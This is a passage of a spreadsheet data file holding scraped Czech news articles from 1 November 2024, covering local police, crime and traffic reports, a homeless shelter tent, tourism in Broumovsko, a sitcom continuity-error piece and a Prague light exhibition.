HN</t>
  </si>
  <si>
    <t>20241101_388_3242346515_a7b8c9430e19243fd633.html</t>
  </si>
  <si>
    <t>a7b8c9430e19243fd633</t>
  </si>
  <si>
    <t>Nové služební vozidlo Škoda Kodiaq zefektivní zásahy prvosledových hlídek plzeňské městské policie</t>
  </si>
  <si>
    <t>Nové služební vozidlo Škoda Kodiaq zefektivní zásahy prvosledových hlídek plzeňské městské policie Městská policie Plzeň převzala nový služební vůz Škoda Kodiaq, který bude využíván tzv. prvosledovými hlídkami. Tyto hlídky jsou prvními, které zasahují při krizových událostech, a nový automobil jim umožní efektivněji reagovat na situace, kdy je třeba zajistit bezpečnost občanů i samotných strážníků. Slavnostního uvedení vozidla do provozu se zúčastnili velitel městské policie Petr Nováček , primátor města Plzně Roman Zarzycký a další významní hosté. Nový služební vůz (fotografie: M. Pecuch) „Městská policie je pro město Plzeň nepostradatelná. Strážníkům je za to třeba nejen děkovat, ale také jim zajistit odpovídající vybavení pro kvalitní výkon služby. Navíc se jedná i o jeden z faktorů, které ovlivňují příchod nových tváří v rámci náborové kampaně. Zkrátka díky nové Škodě Kodiaq bude Městská policie Plzeň zase akceschopnější a atraktivnější, a to je dobře,“ uvedl primátor Roman Zarzycký. Služební automobil je kromě standardní digitální radiostanice vybaven také GPS systémem, který umožňuje jeho přesnou lokalizaci, a záznamovou online kamerou sledující dění před vozidlem. Tato kamera poskytuje důležité důkazní materiály v případě dopravních nehod nebo jiných mimořádných událostí. Výraznou součástí výbavy je také speciální vestavba v zavazadlovém prostoru, která umožňuje rychlý a snadný přístup k vybavení prvosledových hlídek, jako je zdravotnický batoh, defibrilátor, analyzátor alkoholu v dechu, balistický štít, teleskopický žebřík a dalších nezbytných pomůcek. „Pořízení tohoto vozu určeného pro prvosledové hlídky je ojedinělé. Škoda Kodiaq je první svého druhu v naší výbavě a nabízí velký úložný prostor, který umožňuje efektivnější přepravu veškerého potřebného vybavení. I když v budoucnu plánujeme pořizovat menší modely Škoda Karoq, Kodiaq zůstane klíčovou součástí pro náročné zásahy, kde je potřeba maximální připravenost,“ zdůraznil Petr Nováček . Editace textu: Eva Barborková Zveřejněno: 1. 11. 2024, Martin Pecuch Sdílet Autor: Martin Pecuch Autor person Martin Pecuch</t>
  </si>
  <si>
    <t>17170</t>
  </si>
  <si>
    <t>15190</t>
  </si>
  <si>
    <t>20241101_389_3242705066_fe021a6de7d8312a1e09.html</t>
  </si>
  <si>
    <t>fe021a6de7d8312a1e09</t>
  </si>
  <si>
    <t>Teorie velkého třesku: Chyby, kterých jste si nevšimli!</t>
  </si>
  <si>
    <t>Teorie velkého třesku: Chyby, kterých jste si nevšimli! Po minulých Přátelích se vracíme s dalším hledáním chyb a opět se zaměříme na sitcom. Tentokrát se jedná o velmi oblíbenou Teorii velkého třesku, která se začala vysílat už v roce 2007 a skončila teprve nedávno, konkrétně v roce 2019. Sitcom nabídl celkem 279 epizod, což je dokonce o 43 víc než zmínění Přátelé. A tak je jasné, že i zde se dá najít spousta chyb. My jsme vybrali těch 10 nejzajímavějších. Prádlo.První chyba, kterou dnes zmíníme, se nachází v první epizodě druhé série. Po úvodní znělce můžeme sledovat, jak si Shelden velmi precizně skládá své oblečení. Do prádelny však přijde Penny, která s ním potřebuje probrat svůj vztah s Leonardem. Pennina přítomnost pravděpodobně Sheldona rozruší, protože během jejich konverzace dojde k podivnému přesouvání prádla. V tomto záběru vidíme, jak si Sheldon připravuje své modré tričko na stole, následuje bližší záběr na obě postavy. A aniž bychom viděli Sheldona tričko složit, má najednou připravené ponožky. Navíc je vidět, že modré tričko leží zmačkané tam, kde bylo před chvílí. Víno .Pro další chybu se musíme přesunout do třetí série, kde v páté epizodě vezme Leonard s Penny Howarda na večeři. Večeře má jasný cíl, seznámit Howarda s Bernadette, se kterou, jak jistě víte, nakonec i skončí. Ale to předbíháme. Při této večeři jsme si všimli klasické chyby, které si lze všimnout snad v každém filmu nebo seriálu. Zpočátku se večeře nejevila nějak úspěšná, ale najednou Howard s Bernadette narazí na téma, které oba sdílejí. Bláznivé matky. Během této konverzace, kdy se úhel kamery často mění, se mění i množství vína v Howardově sklenici. Vzhledem k tomu, že konverzace je natáčena v podstatě v jednom kuse, je nemožné, aby si Howard dolil víno , aniž bychom si toho nevšimli. Jedná se tedy o zjevnou chybu. Tabule.V jedenácté epizodě sedmé série musí Sheldon odjet domů do Texasu kvůli blížícímu se porodu jeho sestry. Většina přátel tedy zůstává bez něj a tráví společně vánoční svátky. Celá tato vánoční epizoda se nese v duchu situací, které by mohly nastat, kdyby se stalo to nebo ono. V jedné scéně dokonce můžeme vidět Amy, jak na tabuli kreslí situace, které by nikdy nenastaly, pokud by nepoznali Sheldona. Jak můžete vidět, zde nakreslí čáru, která ukazuje, že pokud by nebylo Sheldona, Penny by nikdy nepotkala Stana Leeho . Čára, kterou Amy nakreslí, je v tu chvíli poměrně tlustá a jasně černá. Poté se záběr zaměří na Penny, a když se vrátí zpět na tabuli je čára najednou od dost tenčí a navíc modrá. Krabička.Drtivá většina sitcomů má své ikonické místo, kde se hlavní postavy setkávají a kde probíhá nejvíce dialogu. Pro Teorii velkého třesku byl tímto místem samozřejmě Leonardův a Sheldonův byt. Zde se přátelé často scházeli, aby se společně najedli. Tato situace se objevila i ve čtrnácté epizodě druhé série, kde Penny se Sheldonem před jídlem rozebírají půjčené peníze. Ve scéně, kde Sheldon mluví směrem k Penny, má své jídlo ještě pevně zavřené v krabičce z restaurace. Během chvíle se však krabička sama od sebe otevře, aniž bychom viděli, jak k tomu došlo. Sklenička Po malé pauze, se vracíme k chybě, která opět souvisí s vínem . Jedná se o klasickou chybu, které si všímáme čím dál častěji a již jsme ji v různých podobách zmiňovali ve více videích. V páté epizodě páté série se tři hlavní ženské postavy sejdou u Penny v bytě na skleničku vína . Poté, co Penny nalije Bernadette víno do skleničky, můžeme vidět, jak ji drží levou rukou. Pak se však rozhodne napít, změní se záběr a Bernadette očividně drží skleničku v druhé ruce. Když ji ale znovu pokládá na stůl, drží ji opět levou rukou. Jak už jsme řekli, jedná se o klasickou chybu, kterou lze najít téměř všude. Koktejl.Abychom ukázali, jak častá je tato chyba. Rozhodli jsme se vybrat ještě jednu scénu, kde se také objevila. Jedná se o osmou epizodu první série, kde Rajesh zjistí, že se dokáže bavit s dívkami, pokud je pod vlivem alkoholu . Vyrazí proto na randl se známou dívkou z dětství a během něj pije zelený koktejl. Jak sami můžete vidět, Rajesh drží skleničku v pravé ruce. Pak se napije, změní se záběr a sklenička je najednou v levé ruce. Následuje další změna záběru a ruce se opět prohodí. Videohovor. V této epizodě jsme si všimli ještě jedné chyby, kterou musíme zmínit. Hned v úvodu Rajeshovi zavolají rodiče z Indie přes videohovor, aby mu domluvili schůzku. Jak asi víte, jedná se právě o tu slečnu, se kterou byl Rajesh později na rande. Jeho rodiče v jednu chvíli požádají všechny jeho přátelé, aby se shromáždili před počítačem a poslouchali s ním.V tomto záběru si můžete všimnout, že Sheldon se sklonil vedle křesla. Avšak když se záběr změní, na rodiče, je vidět právě tato strana křesla, o kterou se Sheldon opíral. Sheldon však nikde není. Samozřejmě to bylo kvůli tomu, aby neclonil a takový záběr mohl být natočen, ale pak to vypadá, jako by na chvíli zničehonic zmizel. Ipod.V první sérii ještě chvíli zůstaneme a podíváme se až do poslední epizody. Zde hned v úvodu Howard učí Sheldona mandarinsky, avšak jejich poklidné vyučování naruší rozzuřená Penny. Ta se totiž rozhodla vyhodit expřítelův ipod z jejich okna. Bystrému divákovi však neuniklo, že Ipod, který drží v ruce, je celý černý. Po znělce pořadu a Leonardově snaze o utišení Penny do bytu přijde celý šťastný Rajesh. Ten má radost díky tomu, že na ulici našel rozbitý iPod, který Penny zrovna vyhodila. Jak ale můžete vidět, tenhle rozhodně černý není. Buď tak Rajesh našel nějaký jiný, nebo se jedná o další chybu. Prací prášek. Stejně jako u první chyby dnešního videa i u této se musíme přesunout do prádelny. Zde se potkává Penny s Leonardem, který ji řekne o svém novém vztahu. Poté se Leonard ještě doptává na další otázky, avšak během jejich konverzace se za ním krabice od pracího prášku začne střídavě sama otevírat a zavírat. Zprvu je viditelně zavřená, ale poté se její stav v různých záběrech střídá. Polštář.Na úplný závěr se vrátíme k úplně první epizodě s názvem Pilot, zde se dva hlavní aktéři teprve seznamují s Penny. A ačkoliv pro Leonarda je její stěhování příležitostí, jak se seznámit, pro Sheldona na to tak veselé není. Penny mu totiž zasedla jeho místo. Ve chvíli, kdy jí Sheldon vysvětluje důležitost tohoto místa, si můžete všimnout, jak se v jednu chvíli změní umístění modrého polštáře na gauči. Poznat to lze velmi snadno díky našitým bílým knoflíkům. A jako bonus jsme si všimli velmi zvláštně vypadající židle, která má jakoby čtyři falešné nohy, ale ve skutečnosti sedátko drží kovová tyč uprostřed. Tohle bylo 10 chyb, kterých jsme si všimli v seriálu Teorie velkého třesku. Víte i o dalších? Pokud ano, napište nám je do komentářů, rádi si je přečteme. Na závěr ještě zmíníme, že pokud hodnotíte filmy na ČSFD a bojíte se přesunu na Kinobox kvůli ztrátě dat, tak dnes již nemusíte. Všechna svá hodnocení i s recenzemi si můžete hravě převést na pár kliknutí. Stačí se registrovat a v nastavení účtu vybrat import. Těšíme se na vás. Po minulých Přátelích se vracíme s dalším hledáním chyb a opět se zaměříme na sitcom. Tentokrát se jedná o velmi oblíbenou Teorii velkého třesku, která se začala vysílat už v roce 2007 a skončila teprve nedávno, konkrétně v roce 2019. Sitcom nabídl celkem 279 epizod, což je dokonce o 43 víc než zmínění Přátelé, a tak je jasné, že i zde se dá najít spousta chyb. Více o seriálu najdete na Kinobox.cz. Pořad: Kinobox</t>
  </si>
  <si>
    <t>20241101_39_3251453850_350e8b9cd951f74fd412.html</t>
  </si>
  <si>
    <t>350e8b9cd951f74fd412</t>
  </si>
  <si>
    <t>Kontroly zazimování rekreačních objektů</t>
  </si>
  <si>
    <t>Kontroly zazimování rekreačních objektů Kristýna KLOUBKOVÁ, moderátorka: Policisté na koních a se psy dnes na Zlínsku kontrolovali zazimování rekreačních objektů. Po skončení letní sezony totiž chodí do chatových oblastí pravidelně hlídkovat. Počet krádeží tam prý i díky tomu klesl o polovinu. Michal BOROVSKÝ, reportér: Pomalu se blíží konec sezony a lidé zazimování své chaty. Vrátí se do nich zase na jaře. Tohoto období často využívají zloději, a tak policisté na Zlínsku vyrazili do terénu. Policisté u chat kontrolují například to, jestli nejsou rozbitá okna, povolené mříže anebo jestli je chata dostatečně uzamčená. Petr GAJDOŠÍK, policejní kynolog: Nejčastěji se zaměřují na to, že kradou nářadí, jídlo nebo alkohol . Nebo nám tam přespí, a to tak, že rozbijí okno. Pokud není zabezpečené nebo tam bylo mít třeba kování u dveří, dostanou se do vnitřku. Michal BOROVSKÝ, reportér: Policisté hlídkují v chatových oblastech pravidelně a preventivní opatření se prý vyplácejí. V okrese Zlín lidé nahlásili letos 40 takových krádeží oproti loňským 80. Monika KOZUMPLÍKOVÁ, mluvčí Policie ČR, Zlín : Porovnání s loňským rokem evidujeme značný pokles vykradených chat, a to hned o polovinu. Anketa: Všechno schovám, tady nezůstane venku vůbec nic. Zamykáme. Máme dobrý zámky. Policie to tu pravidelně kontroluje. A vás vykradli někdy, nebo ne? Ne. My už jsme tu tak 47 roků a ještě se nestala Monika KOZUMPLÍKOVÁ, mluvčí Policie ČR, Zlín : Pokud se dostanou do chaty, tak se můžou dopustit hned tří trestných činů, a to krádež a porušování domovní svobody a poškození cizí věci. Michal BOROVSKÝ, reportér: V případě dopadení pak hrozí zloději až několik let za mřížemi podle výše způsobené škody.</t>
  </si>
  <si>
    <t>20241101_390_3242494413_7442c095fd87245a97ec.html</t>
  </si>
  <si>
    <t>7442c095fd87245a97ec</t>
  </si>
  <si>
    <t>Lidé bez domova můžou v Teplicích nocovat ve vyhřívaném stanu. Vejde se do něj 15 lidí</t>
  </si>
  <si>
    <t>Lidé bez domova můžou v Teplicích nocovat ve vyhřívaném stanu. Vejde se do něj 15 lidí V pátek 1. listopadu v 19:30 se v Teplicích otevírá noclehárna pro bezdomovce. Novou službu poskytne každou noc do konce března vyhřívaný stan v městské části Trnovany. Lidé bez domova v něm můžou zdarma přenocovat. „Je to vyhřívaný stan s plynovým topením, do kterého se vejde 15 lidí. Máme tu ještě i menší stan, tak zhruba pro čtyři lidi – tam by mohl jít třeba nějaký manželský pár, nebo třeba lidé se psem,“ popisuje Oto Kovanda, který vede teplické kontaktní centrum White Light, na jehož dvorku teď stojí velký vojenský stan. „První dva měsíce budou moci lidé spát tady na těchto podlážkách, od ledna pak na polních lůžkách. Každý by si měl přinést svůj spacák, máme tu k zapůjčení nějaké karimatky, malé stany a budou se kupovat i nějaké deky. Podmínkou pro využívání této služby je chovat se slušně, neměl by být viditelně pod vlivem drog či alkoholu a dodržovat naše pravidla,“ přibližuje Kovanda. Na pořádek budou dohlížet dva spolupracovníci centra, kteří tu nově budou přes noc. „Jsou to všechno zkušení sociální pracovníci, je nastavena i spolupráce s městskou policií,“ dodává Kovanda. Je to v zájmu města, vysvětluje teplický primátor „Aby tam nedocházelo k žádným problémům – tomu chceme předejít. Proto má městská policie speciálně úkol, aby na tohle dohlédla,“ doplňuje ho primátor Teplic Jiří Štábl z hnutí ANO. Podle něj chce město zjistit zájem o noclehárnu a také zamezit tomu, aby lidé bez domova v zimě přespávali na náhodných místech, třeba ve sklepech a chodbách domů, nebo na lavičkách. „Počítáme s provozem od listopadu do března. Lidé, kteří jsou v nouzi nebo bez domova, budou mít možnost v tomto místě přespat. Mohou tam i využít hygienické zařízení,“ uvedl Štábl. Město bude stát pětiměsíční provoz vyhřívaného stanu pro 15 lidí 250 000 korun. Během velkých mrazů budou v centrech Květina a White Light případně k dispozici i takzvané Krizové židle. Autor: Jana Vitásková Autor Jana Vitásková Rubrika transition_slide Zprávy ze Severu</t>
  </si>
  <si>
    <t>3700</t>
  </si>
  <si>
    <t>20241101_391_3242436381_5d76c01e6d8d4054449f.html</t>
  </si>
  <si>
    <t>5d76c01e6d8d4054449f</t>
  </si>
  <si>
    <t>Svatomartinské husy v Roští! Vyhlášená restaurace láká na tradiční pochoutky</t>
  </si>
  <si>
    <t>Svatomartinské husy v Roští! Vyhlášená restaurace láká na tradiční pochoutky Užijte si v restauraci Roští sváteční husí menu plné chutí. Na jaké speciality se můžete těšit? Čtěte v článku. I v letošním roce se bude v restauraci Roští , která se nachází v malebném prostředí nedaleko křimického zámku, podávat speciální svatomartinské menu. Letošní akce Svatomartinské husy se bude konat od 8. do 11. listopadu 2024. Vzhledem k vysokému zájmu si raději včas zarezervujte stůl! Vyhlášená restaurace Roští totiž připravila čtyřdenní menu plné lahodných husích specialit. Těšit se můžete na husí kaldoun, husí paštiku a tradiční vypečenou husu, konfitovanou v bylinkovém sádle s karlovarským knedlíkem a variací zelí. Chybět nebudou ani vybraná svatomartinská vína . Po celou dobu bude k dispozici také stálá nabídka restaurace! Nečekejte a rezervujte si svůj stůl na telefonním čísle 731 207 001 nebo na rezervace@restauracerosti.cz. Dopřejte si husí pochoutky ve stylovém prostředí restaurace Roští. Neváhejte, ať máte své místo u stolu jisté. Foto restaurace Roští Autor: QAP.cz - Vaše internetové noviny || ZB</t>
  </si>
  <si>
    <t>20241101_392_3242736117_0229227d98da4a85c56f.html</t>
  </si>
  <si>
    <t>0229227d98da4a85c56f</t>
  </si>
  <si>
    <t>Cestou z narozeninové oslavy vyvrátil mladík stopku. Hrozí mu až šestileté vězení 1.11.2024 Jeseničtí kriminalisté zahájili trestní stíhání 22letého muže, který je obviněný ze spáchání trestného činu poškození a ohrožení provozu obecně prospěšného zařízení. K události došlo začátkem září v obci Velké Kunětice na Jesenicku. Mladý muž se společně s dalšími zúčastnil narozeninové oslavy svého kamaráda. Pravděpodobně posilněn alkoholem si jako předmět svého zájmu vyhlédl svislou dopravní značku „Stůj, dej přednost v jízdě!“, kterou násilím vytrhl z podstavce. Dopravní značka upravující přednost v jízdě následně upadla mimo vozovku a nemohla tak plnit svůj účel. Obviněnému dle trestního zákoníku hrozí trest odnětí svobody na jeden rok až šest let nebo peněžitý trest. ...</t>
  </si>
  <si>
    <t>310</t>
  </si>
  <si>
    <t>20241101_393_3242324191_8dd07b82e5f4af4286cb.html</t>
  </si>
  <si>
    <t>8dd07b82e5f4af4286cb</t>
  </si>
  <si>
    <t>Anna K. v péči psychologů: Stále se trápí rozchodem. Prozradila, co teď nejvíc nesnáší Zpěvačka Anna K. se stále vzpamatovává z nečekaného rozchodu se svým partnerem Tomášem Varteckým. Pro web Blesk.cz přiznala, že musela dokonce vyhledat pomoc psychologa. Zpěvačka Anna K. se v srpnu po 27 letech rozešla se svým partnerem Tomášem Varteckým . Klíčovou roli údajně hrála závislost na drogách a alkoholu . Vartecký se již od té doby stihl oženit, zatímco Anna K. se z rozchodu zřejmě stále nevzpamatovala. Na začátku října proto odletěla na dovolenou do Turecka . „Bylo to krásných deset dnů. Četla jsem si konečně knížky, což se mi dlouho nedělo, protože můj mozek se nedokázal vůbec soustředit,“ popsala pro web Super.cz . Dodala, že plavala v nádherném moři a zdravě jedla. „Vracím se do zdravého režimu, cvičím s osobní trenérkou, která za mnou jezdí. Ta mě pořád strašně chválí, což mě samozřejmě motivuje,“ sdělila. Aby vše zvládla, musela prý vyhledat pomoc psychologů. „Starám se i o své duševní zdraví s odborníky, protože to je taky cesta ke zdraví, a není nutné si říkat, že člověk vše zvládne sám. Někdy to totiž možné není, a když vám někdo, kdo má na to seriózní vzdělání, pomůže, jde to vše o moc lépe. Když máte zlomenou nohu, musíte taky k doktorovi a se zlomeným srdcem je to stejné,“ má jasno. Prý si také uvědomuje, že překonat rozchod vyžaduje čas. „Bude asi potřeba hodně trpělivosti a já to slovo už úplně nesnáším, protože ho poslouchám pořád: Musíš být trpělivá, chce to čas atd. Ale tak jdu prostě do toho,“ řekla. redaktor FTV Prima , CNN Prima NEWS Autor: Václav Černý Autor person Václav Černý</t>
  </si>
  <si>
    <t>20241101_394_3242736115_a35f91059b96b5747b5f.html</t>
  </si>
  <si>
    <t>a35f91059b96b5747b5f</t>
  </si>
  <si>
    <t>Strážníkům v Brně nestačilo rozpětí alkoholtesteru. Opilec nadýchal příliš mnoho 1.11.2024 Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky čtyřiapadesátiletý muž. Přijeli ho zkontrolovat do tramvajové smyčky v Řečkovicích po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně podroušený alkoholem . Měla ale obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun. ...</t>
  </si>
  <si>
    <t>20241101_395_3242716961_6be6d90376bc009b2beb.html</t>
  </si>
  <si>
    <t>6be6d90376bc009b2beb</t>
  </si>
  <si>
    <t>Stíny 1. listopadu</t>
  </si>
  <si>
    <t>Stíny 1. listopadu Pátek, 01 Listopad 2024 08:19 Řidička je podezřelá z přestupku Ve středu 30. října zastavili policisté před jednou hodinou v noci v Třebíči vozidlo Škoda Fabia, které jelo po ulici Brněnská. U sedmadvacetileté řidičky provedli dechovou zkoušku s negativním výsledkem. Test na zjištění ovlivnění návykovou látkou byl ale u ženy pozitivní na kokain. Řidička již v další jízdě nesměla pokračovat. Je podezřelá ze spáchání přestupkového jednání na úseku dopravy. Opilého policisté zajistili Ve středu 30. října byli policisté v Třebíči po osmé hodině večer přivoláni na ulici Sokolská, kde ležel na zemi nedaleko železniční tratě muž. Byl v pořádku, ale značně opilý. Policisté provedli u dvaadvacetiletého muže dechovou zkoušku, při které mu naměřili hodnotu 1,98 promile alkoholu Byl ve stavu, kdy se o sebe nebyl schopen sám postarat. Policisté opilého muže zajistili a odvezli ho na protialkoholní záchytnou stanici k vystřízlivění. Jana Kroutilová Aktualizováno Středa, 06 Listopad 2024 09:02 Autor: Administrator</t>
  </si>
  <si>
    <t>20241101_396_3242267544_cd875d5d59a8f20be4b2.html</t>
  </si>
  <si>
    <t>cd875d5d59a8f20be4b2</t>
  </si>
  <si>
    <t>Přes třicet zraněných, škody za více než deset milionů. Takový byl uplynulý týden na silnicích v kraji</t>
  </si>
  <si>
    <t>Přes třicet zraněných, škody za více než deset milionů. Takový byl uplynulý týden na silnicích v kraji Ústecký kraj – V minulém týdnu došlo v Ústeckém kraji ke 186 dopravním nehodám a haváriím. Při nehodách nezemřela žádná osoba, 2 osoby utrpěly těžké zranění a 30 osob se zranilo lehce. Hmotná škoda byla odhadnuta na 10 130 000 korun. Počet nehod v jednotlivých okresech: Děčín – 35 Chomutov – 34 Litoměřice – 11 Louny – 15 Most – 29 Teplice - 33 Ústí nad Labem – 22 Dálniční oddělení Řehlovice – 7 „Nejčastější příčinou dopravních nehod byl nesprávný způsob jízdy, a to ve 106 případech," uvedla policejní mluvčí Pavla Mašínová s tím, že ve 20 případech bylo příčinou nedání přednosti v jízdě a v 10 případech nepřiměřená rychlost. Z celkového počtu dopravních nehod byli 4 řidiči pod vlivem alkoholu a žádný řidič pod vlivem omamných a psychotropních látek. Autor: TZ Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>11810</t>
  </si>
  <si>
    <t>6040</t>
  </si>
  <si>
    <t>20241101_397_3242272876_9caf04dc9547a7292091.html</t>
  </si>
  <si>
    <t>9caf04dc9547a7292091</t>
  </si>
  <si>
    <t>Objevte všechny krásy Broumovska</t>
  </si>
  <si>
    <t>Objevte všechny krásy Broumovska 1 ZOBRAZENÍ Broumovsko je neprávem opomíjeným, ale postupně objevovaným regionem v Královéhradeckém kraji na samé hranici s Polskem . Vydejte se poznávat Broumovský výběžek, který nabízí svým obyvatelům i návštěvníkům nesčetné krásy. Ať už obdivovaná skalní města, skvostné barokní památky v čele s Klášterem Broumov nebo hluboké a tiché lesy sevřené horami. Srdcem Broumovska je město Broumov , které usiluje o zisk prestižního titulu Evropské město kultury 2028. Ve finále se utká s Českými Budějovicemi . V centru Broumova se vypíná impozantní broumovský klášter, který se díky Vzdělávacímu a kulturnímu centru Broumov stal střediskem kulturního dědictví. V klášteře můžete celoročně navštívit prohlídkový okruh s historickými interiéry, volně přístupnou klášterní zahradu, klášterní kavárnu Café Dientzenhofer, restauraci U Tří růží nebo Dětskou galerii Lapidárium. Pravidelně tu pořádají interaktivní prohlídky skriptoria s knihovnou, degustace vín v benediktinských sklepích nebo organizují trhy s regionálními produkty. Přímo v barokním komplexu navíc máte možnost se ubytovat, a to v renovovaných mnišských celách Domu hostů. Klášter Broumov Jedenáct perel v krajině Klášter Broumov ale není zdaleka jedinou barokní perlou v regionu. Nachází se tu soubor nazvaný Broumovská skupina kostelů od stavitelů Kryštofa Dientzenhofera a jeho syna Kiliána Ignáce Dientzenhofera . Tento soubor staveb se v roce 2022 stal národní kulturní památkou. Celkem se jedná o jedenáct kostelů, které tvoří vzájemně provázaný architektonický soubor výjimečný zejména díky svému urbanistickému působení v krajině. Hřbitovní kostel Panny Marie Dokonalé tesařské dílo Zcela unikátní je také další církevní stavba v Broumově – hřbitovní kostel Panny Marie. Je jednou z nejstarších dřevěných sakrálních staveb ve střední Evropě , pochází pravděpodobně z roku 1450. Kostel je výjimečný nejen svým stářím, ale i technikou stavby. Nenajdete v něm jediný hřebík, celá jeho trámová konstrukce lodi a kněžiště, stropu a krovů, na které je nasazena vysoká zvonice, tvoří jeden celek, dokonalé tesařské dílo. Vesnice monumentálních památek Z hlediska architektury byste si během své návštěvy Broumovska měli povšimnout také takzvaných statků broumovského typu. Byly postaveny ve stylu klasicismu ve druhé polovině 19. století a typické jsou pro ně monumentální, bohatě zdobené štíty orientované do silnice. Prohlédnout si je můžete například ve vesnici Křinice , která je od roku 1995 vesnickou památkovou rezervací a dodnes jedinou památkově chráněnou vesnicí na Broumovsku . Bohužel se mnoho těchto statků, stejně jako kostely z Broumovské skupiny kostelů, nachází v zuboženém stavu a potřebují opravu. Dětský ráj tisíce věží Na Broumovsku se nebudou nudit ani vaše nejmenší ratolesti. Takřka povinností je návštěva přírodní rezervace Adršpašsko -teplických skal, které je okouzlí tisíci skalními věžemi, výhledy a pojmenovanými skalními útvary. Nezapomeňte však, abyste si zejména v exponované turistické sezoně do Adršpašských skal koupili svůj lístek pro vstup a na parkování předem online. Ušetříte tím nejen svoje peníze, ale také čas. Vzhůru do Ocelového města! Zárukou skvěle stráveného času s dětmi je návštěva Muzea stavebnice Merkur v Polici nad Metují . Tato tradiční česká stavebnice vznikla v roce 1920 a její inovovaný systém se v nezměněné podobě zachoval dodnes. Součástí expozice je nejen herna, ve které si vyzkoušíte svoji zručnost při práci se stavebnicí, ale také Ocelové město, největší model z Merkuru zapsaný do Guinnessovy knihy rekordů. Mlýn Dřevíček Třetí princ čeká v podzemí Nedaleko odtud se nachází jediný plně funkční obilný vodní mlýn ve východních Čechách – Mlýn Dřevíček, který si vaši pozornost také zaslouží, nebo Měděný důl Bohumír, do něhož můžete sfárat a projít se pod zemí trasou dlouhou 400 metrů. Nejen v případě nepříznivého počasí se skvěle zabavíte na Zámku Adršpach s jeho stálou expozicí o životě na zámku nebo ve zdejším muzeu horolezectví. A na motivy pohádky Třetí princ s Libuší Šafránkovou , která se v Adršpachu natáčela, tu mají v tajemném zámeckém sklepení připravenou dokonce speciální únikovou hru. Do pivovaru s celou rodinou Milovníci piva jistě ocení exkurzi do Pivovarského muzea v areálu olivětínského pivovaru Opat. Vedle prohlídky pivovaru spojenou s ochutnávkou místních piv mohou absolvovat i prohlídku stálé expozice pivovarnictví zaměřenou na historii pivovaru. Během návštěvy je k vidění například kancelář nejdůležitější osoby celého pivovaru – sládka. Prohlídku si užijí i rodiny s dětmi, protože na nejmladší návštěvníky čeká alchymista Opatus a jeho skřítkové. Foto: Archiv institucí, Shutterstock Autor: Jiřina Mlejnková Autor person Jiřina Mlejnková Rubrika transition_slide Nejkrásnější památky</t>
  </si>
  <si>
    <t>159</t>
  </si>
  <si>
    <t>20241101_398_3242416546_a1b0cee73b7020f4cbcb.html</t>
  </si>
  <si>
    <t>a1b0cee73b7020f4cbcb</t>
  </si>
  <si>
    <t>Světla vyprávějí – Praha Žluté lázně</t>
  </si>
  <si>
    <t>Světla vyprávějí – Praha Žluté lázně Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstava bude otevřena od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelné parky „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti 